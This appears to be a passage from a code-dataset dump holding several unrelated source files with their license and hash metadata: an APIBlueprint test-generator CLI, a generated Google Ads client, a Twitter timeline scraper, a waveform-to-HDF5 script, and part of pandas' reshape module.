All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the AO InvestGroup nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL VADIM MARKOVTSEV BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import argparse
import os
from .generator import TestsGenerator
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--template", help="Jinja2 template to use",
default=os.path.abspath(os.path.join(
os.path.dirname(__file__), "tests.jinja2")))
parser.add_argument("-b", "--base-class",
help="Fully qualified base class for tests")
parser.add_argument("-c", "--no-comments", action="store_true",
help="Do not add docstrings to classes and methods")
parser.add_argument("-o", "--output", help="Output Python file with tests")
parser.add_argument("--disable-html2text", action="store_true",
help="Do not use html2text to convert descriptions "
"(otherwise it makes this program licensed under "
"GPLv3!)")
parser.add_argument("input", nargs='+', help="Input APIBlueprint files")
args = parser.parse_args()
generator = TestsGenerator(
args.template, include_comments=not args.no_comments,
base_class=args.base_class, html2text=not args.disable_html2text,
*args.input)
generator.generate(args.output)
if __name__ == "__main__":
main()
| bsd-3-clause | -5,848,360,594,570,658,000 | 48.114754 | 79 | 0.70227 | false |
googleapis/googleapis-gen | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/services/services/campaign_simulation_service/client.py | 1 | 19104 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v8.common.types import simulation
from google.ads.googleads.v8.enums.types import simulation_modification_method
from google.ads.googleads.v8.enums.types import simulation_type
from google.ads.googleads.v8.resources.types import campaign_simulation
from google.ads.googleads.v8.services.types import campaign_simulation_service
from .transports.base import CampaignSimulationServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import CampaignSimulationServiceGrpcTransport
class CampaignSimulationServiceClientMeta(type):
"""Metaclass for the CampaignSimulationService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[CampaignSimulationServiceTransport]]
_transport_registry['grpc'] = CampaignSimulationServiceGrpcTransport
def get_transport_class(cls,
label: str = None,
) -> Type[CampaignSimulationServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class CampaignSimulationServiceClient(metaclass=CampaignSimulationServiceClientMeta):
"""Service to fetch campaign simulations."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CampaignSimulationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CampaignSimulationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> CampaignSimulationServiceTransport:
"""Return the transport used by the client instance.
Returns:
CampaignSimulationServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def campaign_simulation_path(customer_id: str,campaign_id: str,type: str,modification_method: str,start_date: str,end_date: str,) -> str:
"""Return a fully-qualified campaign_simulation string."""
return "customers/{customer_id}/campaignSimulations/{campaign_id}~{type}~{modification_method}~{start_date}~{end_date}".format(customer_id=customer_id, campaign_id=campaign_id, type=type, modification_method=modification_method, start_date=start_date, end_date=end_date, )
@staticmethod
def parse_campaign_simulation_path(path: str) -> Dict[str,str]:
"""Parse a campaign_simulation path into its component segments."""
m = re.match(r"^customers/(?P<customer_id>.+?)/campaignSimulations/(?P<campaign_id>.+?)~(?P<type>.+?)~(?P<modification_method>.+?)~(?P<start_date>.+?)~(?P<end_date>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, CampaignSimulationServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the campaign simulation service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.CampaignSimulationServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, CampaignSimulationServiceTransport):
# transport is a CampaignSimulationServiceTransport instance.
if credentials:
raise ValueError('When providing a transport instance, '
'provide its credentials directly.')
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = CampaignSimulationServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_campaign_simulation(self,
request: campaign_simulation_service.GetCampaignSimulationRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> campaign_simulation.CampaignSimulation:
r"""Returns the requested campaign simulation in full
detail.
Args:
request (:class:`google.ads.googleads.v8.services.types.GetCampaignSimulationRequest`):
The request object. Request message for
[CampaignSimulationService.GetCampaignSimulation][google.ads.googleads.v8.services.CampaignSimulationService.GetCampaignSimulation].
resource_name (:class:`str`):
Required. The resource name of the
campaign simulation to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.resources.types.CampaignSimulation:
A campaign simulation. Supported combinations of advertising
channel type, simulation type and simulation
modification method is detailed below respectively.
SEARCH - CPC_BID - UNIFORM SEARCH - CPC_BID - SCALING
SEARCH - TARGET_CPA - UNIFORM SEARCH - TARGET_CPA -
SCALING SEARCH - TARGET_ROAS - UNIFORM SEARCH -
TARGET_IMPRESSION_SHARE - UNIFORM SEARCH - BUDGET -
UNIFORM SHOPPING - BUDGET - UNIFORM SHOPPING -
TARGET_ROAS - UNIFORM MULTIPLE - TARGET_CPA - UNIFORM
OWNED_AND_OPERATED - TARGET_CPA - DEFAULT DISPLAY -
TARGET_CPA - UNIFORM
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a campaign_simulation_service.GetCampaignSimulationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, campaign_simulation_service.GetCampaignSimulationRequest):
request = campaign_simulation_service.GetCampaignSimulationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_campaign_simulation]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('resource_name', request.resource_name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
__all__ = (
'CampaignSimulationServiceClient',
)
| apache-2.0 | -7,526,720,101,945,983,000 | 45.144928 | 280 | 0.63505 | false |
bmd/twittrscrapr | twittrscrapr/scrapers/timelinescrapr.py | 1 | 1459 | import logging
from ..parsers import DictParser
from base_scraper import TwittrScrapr
log = logging.getLogger('scrapers.TimelineScrapr')
class TimelineScrapr(TwittrScrapr):
def __init__(self, api_keys, writer):
super(TimelineScrapr, self).__init__(api_keys, writer)
def _fetch_user_timeline(self, user):
finished_pagination = False
new_max = None
results = []
parser = DictParser()
while not finished_pagination:
self.check_rate_limit()
call_result = self.api.get_user_timeline(screen_name=user, count=200, include_rts=1, trim_user=True,
max_id=new_max)
if len(call_result) > 0:
results.extend([parser.parse(t, user=user) for t in call_result])
new_max = str(int(call_result[-1]['id_str']) - 1)
else:
finished_pagination = True
self.reset_time = self.api.get_lastfunction_header('x-rate-limit-reset')
self.calls_remaining = self.api.get_lastfunction_header('x-rate-limit-remaining')
return results
@TwittrScrapr.error_handler
def fetch_user_statuses(self, writer):
for user in self.scrape_queue:
log.info('Fetching tweets for {}'.format(user))
res = self._fetch_user_timeline(user)
log.info('Got {} tweets'.format(len(res)))
writer.writerows(res)
| mit | -2,145,231,821,339,842,000 | 33.738095 | 112 | 0.592872 | false |
astroclark/BayesSpec | waveforms/waveforms2hdf5.py | 1 | 1186 | #!/usr/bin/env python
"""
waveforms2hdf5.py loops over the list of waveforms defined in this script and
dumps out an hdf5 file for the plus polarisation. The idea is to then compute
the Shannon entropy of the waveforms using Matlab's wentropy.m function.
"""
import h5py
import numpy as np
import pmns_utils
wfs='/Users/jclark/hmns_repo/results/penultimate_waveforms.txt'
waveform_list=np.loadtxt(wfs,dtype=str)
#waveform_list=['shen_135135_lessvisc','apr_135135']
h5_file=h5py.File('waveforms.hdf5','w')
h5_snr_file=h5py.File('snr.hdf5','w')
for waveform in waveform_list:
# Generate waveform instance
wf=pmns_utils.Waveform(waveform)
# Compute the time series & SNR
wf.make_wf_timeseries()
wf.compute_characteristics()
# Zoom in on signal
peak_idx=np.argmax(wf.hplus.data.data)
wf_start_idx=np.argwhere(abs(wf.hplus.data.data)>0)[0]
wf_end_idx=np.argwhere(abs(wf.hplus.data.data)>0)[-1]
wf_reduced = wf.hplus.data.data[wf_start_idx:wf_end_idx]
h5_file[waveform] = wf_reduced
h5_snr_file[waveform] = wf.snr_plus
#h5_file[waveform]=wf_reduced
#h5_file[waveform+'_snr']=wf.snr_plus
h5_file.close()
h5_snr_file.close()
| gpl-2.0 | -5,496,950,762,767,886,000 | 29.410256 | 78 | 0.713322 | false |
Ziqi-Li/bknqgis | pandas/pandas/core/reshape/reshape.py | 1 | 45812 | # pylint: disable=E1101,E1103
# pylint: disable=W0703,W0622,W0613,W0201
from pandas.compat import range, zip
from pandas import compat
import itertools
import re
import numpy as np
from pandas.core.dtypes.common import (
_ensure_platform_int,
is_list_like, is_bool_dtype,
needs_i8_conversion)
from pandas.core.dtypes.cast import maybe_promote
from pandas.core.dtypes.missing import notna
import pandas.core.dtypes.concat as _concat
from pandas.core.series import Series
from pandas.core.frame import DataFrame
from pandas.core.sparse.api import SparseDataFrame, SparseSeries
from pandas.core.sparse.array import SparseArray
from pandas._libs.sparse import IntIndex
from pandas.core.categorical import Categorical, _factorize_from_iterable
from pandas.core.sorting import (get_group_index, get_compressed_ids,
compress_group_index, decons_obs_group_ids)
import pandas.core.algorithms as algos
from pandas._libs import algos as _algos, reshape as _reshape
from pandas.core.frame import _shared_docs
from pandas.util._decorators import Appender
from pandas.core.index import MultiIndex, _get_na_value
class _Unstacker(object):
"""
Helper class to unstack data / pivot with multi-level index
Parameters
----------
level : int or str, default last level
Level to "unstack". Accepts a name for the level.
Examples
--------
>>> import pandas as pd
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index)
>>> s
one a 1
b 2
two a 3
b 4
dtype: int64
>>> s.unstack(level=-1)
a b
one 1 2
two 3 4
>>> s.unstack(level=0)
one two
a 1 3
b 2 4
Returns
-------
unstacked : DataFrame
"""
def __init__(self, values, index, level=-1, value_columns=None,
fill_value=None):
self.is_categorical = None
if values.ndim == 1:
if isinstance(values, Categorical):
self.is_categorical = values
values = np.array(values)
values = values[:, np.newaxis]
self.values = values
self.value_columns = value_columns
self.fill_value = fill_value
if value_columns is None and values.shape[1] != 1: # pragma: no cover
raise ValueError('must pass column labels for multi-column data')
self.index = index
if isinstance(self.index, MultiIndex):
if index._reference_duplicate_name(level):
msg = ("Ambiguous reference to {0}. The index "
"names are not unique.".format(level))
raise ValueError(msg)
self.level = self.index._get_level_number(level)
# when index includes `nan`, need to lift levels/strides by 1
self.lift = 1 if -1 in self.index.labels[self.level] else 0
self.new_index_levels = list(index.levels)
self.new_index_names = list(index.names)
self.removed_name = self.new_index_names.pop(self.level)
self.removed_level = self.new_index_levels.pop(self.level)
self._make_sorted_values_labels()
self._make_selectors()
def _make_sorted_values_labels(self):
v = self.level
labs = list(self.index.labels)
levs = list(self.index.levels)
to_sort = labs[:v] + labs[v + 1:] + [labs[v]]
sizes = [len(x) for x in levs[:v] + levs[v + 1:] + [levs[v]]]
comp_index, obs_ids = get_compressed_ids(to_sort, sizes)
ngroups = len(obs_ids)
indexer = _algos.groupsort_indexer(comp_index, ngroups)[0]
indexer = _ensure_platform_int(indexer)
self.sorted_values = algos.take_nd(self.values, indexer, axis=0)
self.sorted_labels = [l.take(indexer) for l in to_sort]
def _make_selectors(self):
new_levels = self.new_index_levels
# make the mask
remaining_labels = self.sorted_labels[:-1]
level_sizes = [len(x) for x in new_levels]
comp_index, obs_ids = get_compressed_ids(remaining_labels, level_sizes)
ngroups = len(obs_ids)
comp_index = _ensure_platform_int(comp_index)
stride = self.index.levshape[self.level] + self.lift
self.full_shape = ngroups, stride
selector = self.sorted_labels[-1] + stride * comp_index + self.lift
mask = np.zeros(np.prod(self.full_shape), dtype=bool)
mask.put(selector, True)
if mask.sum() < len(self.index):
raise ValueError('Index contains duplicate entries, '
'cannot reshape')
self.group_index = comp_index
self.mask = mask
self.unique_groups = obs_ids
self.compressor = comp_index.searchsorted(np.arange(ngroups))
def get_result(self):
# TODO: find a better way than this masking business
values, value_mask = self.get_new_values()
columns = self.get_new_columns()
index = self.get_new_index()
# filter out missing levels
if values.shape[1] > 0:
col_inds, obs_ids = compress_group_index(self.sorted_labels[-1])
# rare case, level values not observed
if len(obs_ids) < self.full_shape[1]:
inds = (value_mask.sum(0) > 0).nonzero()[0]
values = algos.take_nd(values, inds, axis=1)
columns = columns[inds]
# may need to coerce categoricals here
if self.is_categorical is not None:
categories = self.is_categorical.categories
ordered = self.is_categorical.ordered
values = [Categorical(values[:, i], categories=categories,
ordered=ordered)
for i in range(values.shape[-1])]
return DataFrame(values, index=index, columns=columns)
def get_new_values(self):
values = self.values
# place the values
length, width = self.full_shape
stride = values.shape[1]
result_width = width * stride
result_shape = (length, result_width)
mask = self.mask
mask_all = mask.all()
# we can simply reshape if we don't have a mask
if mask_all and len(values):
new_values = (self.sorted_values
.reshape(length, width, stride)
.swapaxes(1, 2)
.reshape(result_shape)
)
new_mask = np.ones(result_shape, dtype=bool)
return new_values, new_mask
# if our mask is all True, then we can use our existing dtype
if mask_all:
dtype = values.dtype
new_values = np.empty(result_shape, dtype=dtype)
else:
dtype, fill_value = maybe_promote(values.dtype, self.fill_value)
new_values = np.empty(result_shape, dtype=dtype)
new_values.fill(fill_value)
new_mask = np.zeros(result_shape, dtype=bool)
name = np.dtype(dtype).name
sorted_values = self.sorted_values
# we need to convert to a basic dtype
# and possibly coerce an input to our output dtype
# e.g. ints -> floats
if needs_i8_conversion(values):
sorted_values = sorted_values.view('i8')
new_values = new_values.view('i8')
name = 'int64'
elif is_bool_dtype(values):
sorted_values = sorted_values.astype('object')
new_values = new_values.astype('object')
name = 'object'
else:
sorted_values = sorted_values.astype(name, copy=False)
# fill in our values & mask
f = getattr(_reshape, "unstack_{}".format(name))
f(sorted_values,
mask.view('u1'),
stride,
length,
width,
new_values,
new_mask.view('u1'))
# reconstruct dtype if needed
if needs_i8_conversion(values):
new_values = new_values.view(values.dtype)
return new_values, new_mask
def get_new_columns(self):
if self.value_columns is None:
if self.lift == 0:
return self.removed_level
lev = self.removed_level
return lev.insert(0, _get_na_value(lev.dtype.type))
stride = len(self.removed_level) + self.lift
width = len(self.value_columns)
propagator = np.repeat(np.arange(width), stride)
if isinstance(self.value_columns, MultiIndex):
new_levels = self.value_columns.levels + (self.removed_level,)
new_names = self.value_columns.names + (self.removed_name,)
new_labels = [lab.take(propagator)
for lab in self.value_columns.labels]
else:
new_levels = [self.value_columns, self.removed_level]
new_names = [self.value_columns.name, self.removed_name]
new_labels = [propagator]
new_labels.append(np.tile(np.arange(stride) - self.lift, width))
return MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
def get_new_index(self):
result_labels = [lab.take(self.compressor)
for lab in self.sorted_labels[:-1]]
# construct the new index
if len(self.new_index_levels) == 1:
lev, lab = self.new_index_levels[0], result_labels[0]
if (lab == -1).any():
lev = lev.insert(len(lev), _get_na_value(lev.dtype.type))
return lev.take(lab)
return MultiIndex(levels=self.new_index_levels, labels=result_labels,
names=self.new_index_names, verify_integrity=False)
def _unstack_multiple(data, clocs):
if len(clocs) == 0:
return data
# NOTE: This doesn't deal with hierarchical columns yet
index = data.index
clocs = [index._get_level_number(i) for i in clocs]
rlocs = [i for i in range(index.nlevels) if i not in clocs]
clevels = [index.levels[i] for i in clocs]
clabels = [index.labels[i] for i in clocs]
cnames = [index.names[i] for i in clocs]
rlevels = [index.levels[i] for i in rlocs]
rlabels = [index.labels[i] for i in rlocs]
rnames = [index.names[i] for i in rlocs]
shape = [len(x) for x in clevels]
group_index = get_group_index(clabels, shape, sort=False, xnull=False)
comp_ids, obs_ids = compress_group_index(group_index, sort=False)
recons_labels = decons_obs_group_ids(comp_ids, obs_ids, shape, clabels,
xnull=False)
dummy_index = MultiIndex(levels=rlevels + [obs_ids],
labels=rlabels + [comp_ids],
names=rnames + ['__placeholder__'],
verify_integrity=False)
if isinstance(data, Series):
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__')
new_levels = clevels
new_names = cnames
new_labels = recons_labels
else:
if isinstance(data.columns, MultiIndex):
result = data
for i in range(len(clocs)):
val = clocs[i]
result = result.unstack(val)
clocs = [v if i > v else v - 1 for v in clocs]
return result
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__')
if isinstance(unstacked, Series):
unstcols = unstacked.index
else:
unstcols = unstacked.columns
new_levels = [unstcols.levels[0]] + clevels
new_names = [data.columns.name] + cnames
new_labels = [unstcols.labels[0]]
for rec in recons_labels:
new_labels.append(rec.take(unstcols.labels[-1]))
new_columns = MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
if isinstance(unstacked, Series):
unstacked.index = new_columns
else:
unstacked.columns = new_columns
return unstacked
def pivot(self, index=None, columns=None, values=None):
"""
See DataFrame.pivot
"""
if values is None:
cols = [columns] if index is None else [index, columns]
append = index is None
indexed = self.set_index(cols, append=append)
return indexed.unstack(columns)
else:
if index is None:
index = self.index
else:
index = self[index]
indexed = Series(self[values].values,
index=MultiIndex.from_arrays([index, self[columns]]))
return indexed.unstack(columns)
def pivot_simple(index, columns, values):
"""
Produce 'pivot' table based on 3 columns of this DataFrame.
Uses unique values from index / columns and fills with values.
Parameters
----------
index : ndarray
Labels to use to make new frame's index
columns : ndarray
Labels to use to make new frame's columns
values : ndarray
Values to use for populating new frame's values
Notes
-----
Obviously, all 3 of the input arguments must have the same length
Returns
-------
DataFrame
See also
--------
DataFrame.pivot_table : generalization of pivot that can handle
duplicate values for one index/column pair
"""
if (len(index) != len(columns)) or (len(columns) != len(values)):
raise AssertionError('Length of index, columns, and values must be the'
' same')
if len(index) == 0:
return DataFrame(index=[])
hindex = MultiIndex.from_arrays([index, columns])
series = Series(values.ravel(), index=hindex)
series = series.sort_index(level=0)
return series.unstack()
def _slow_pivot(index, columns, values):
"""
Produce 'pivot' table based on 3 columns of this DataFrame.
Uses unique values from index / columns and fills with values.
Parameters
----------
index : string or object
Column name to use to make new frame's index
columns : string or object
Column name to use to make new frame's columns
values : string or object
Column name to use for populating new frame's values
Could benefit from some Cython here.
"""
tree = {}
for i, (idx, col) in enumerate(zip(index, columns)):
if col not in tree:
tree[col] = {}
branch = tree[col]
branch[idx] = values[i]
return DataFrame(tree)
def unstack(obj, level, fill_value=None):
if isinstance(level, (tuple, list)):
return _unstack_multiple(obj, level)
if isinstance(obj, DataFrame):
if isinstance(obj.index, MultiIndex):
return _unstack_frame(obj, level, fill_value=fill_value)
else:
return obj.T.stack(dropna=False)
else:
unstacker = _Unstacker(obj.values, obj.index, level=level,
fill_value=fill_value)
return unstacker.get_result()
def _unstack_frame(obj, level, fill_value=None):
from pandas.core.internals import BlockManager, make_block
if obj._is_mixed_type:
unstacker = _Unstacker(np.empty(obj.shape, dtype=bool), # dummy
obj.index, level=level,
value_columns=obj.columns)
new_columns = unstacker.get_new_columns()
new_index = unstacker.get_new_index()
new_axes = [new_columns, new_index]
new_blocks = []
mask_blocks = []
for blk in obj._data.blocks:
blk_items = obj._data.items[blk.mgr_locs.indexer]
bunstacker = _Unstacker(blk.values.T, obj.index, level=level,
value_columns=blk_items,
fill_value=fill_value)
new_items = bunstacker.get_new_columns()
new_placement = new_columns.get_indexer(new_items)
new_values, mask = bunstacker.get_new_values()
mblk = make_block(mask.T, placement=new_placement)
mask_blocks.append(mblk)
newb = make_block(new_values.T, placement=new_placement)
new_blocks.append(newb)
result = DataFrame(BlockManager(new_blocks, new_axes))
mask_frame = DataFrame(BlockManager(mask_blocks, new_axes))
return result.loc[:, mask_frame.sum(0) > 0]
else:
unstacker = _Unstacker(obj.values, obj.index, level=level,
value_columns=obj.columns,
fill_value=fill_value)
return unstacker.get_result()
def stack(frame, level=-1, dropna=True):
"""
Convert DataFrame to Series with multi-level Index. Columns become the
second level of the resulting hierarchical index
Returns
-------
stacked : Series
"""
def factorize(index):
if index.is_unique:
return index, np.arange(len(index))
codes, categories = _factorize_from_iterable(index)
return categories, codes
N, K = frame.shape
if isinstance(frame.columns, MultiIndex):
if frame.columns._reference_duplicate_name(level):
msg = ("Ambiguous reference to {0}. The column "
"names are not unique.".format(level))
raise ValueError(msg)
# Will also convert negative level numbers and check if out of bounds.
level_num = frame.columns._get_level_number(level)
if isinstance(frame.columns, MultiIndex):
return _stack_multi_columns(frame, level_num=level_num, dropna=dropna)
elif isinstance(frame.index, MultiIndex):
new_levels = list(frame.index.levels)
new_labels = [lab.repeat(K) for lab in frame.index.labels]
